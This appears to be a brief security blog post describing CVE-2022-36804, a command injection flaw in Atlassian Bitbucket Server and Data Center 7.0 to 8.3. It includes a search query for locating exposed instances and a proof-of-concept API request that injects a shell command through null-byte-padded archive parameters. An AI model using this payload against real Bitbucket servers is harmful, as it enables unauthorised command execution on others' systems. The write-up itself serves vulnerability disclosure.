Atlassian Bitbucket Archive Remote Command Execution Vulnerability Cve 2022 36804
Atlassian Bitbucket Archive Remote Command Execution Vulnerability Cve 2022 36804
Atlassian Bitbucket archive Remote Command Execution Vulnerability CVE-2022-36804
Vulnerability Description
Atlassian issued a security bulletin that disclosed that Bitbucket Server and Data Center introduced a critical security vulnerability in version 7.0.0.
Bitbucket is a web-based version library hosting service provided by Atlassian, which supports Mercurial and Git version control systems.
The official vulnerability announcement describes that there is a command injection vulnerability in multiple API endpoints of Bitbucket Server and Data Center. The vulnerability triggers the attacker with access to the public project or readable permissions to the private project, affecting the version from 7.0 to 8.3
Vulnerability Impact
Atlassian Bitbucket 7.0~8.3
Network surveying and mapping
app=”ATLASSIAN-Bitbucket”
Vulnerability reappears
Login page
Verify POC
1
/rest/api/latest/projects/BIZEE/repos/bizee-communication-api/archive?filename=wN3Am&at=wN3Am&path=wN3Am&prefix=ax%00--exec=%60id%60%00--remote=origin
This post is licensed under CC BY 4.0 by the author.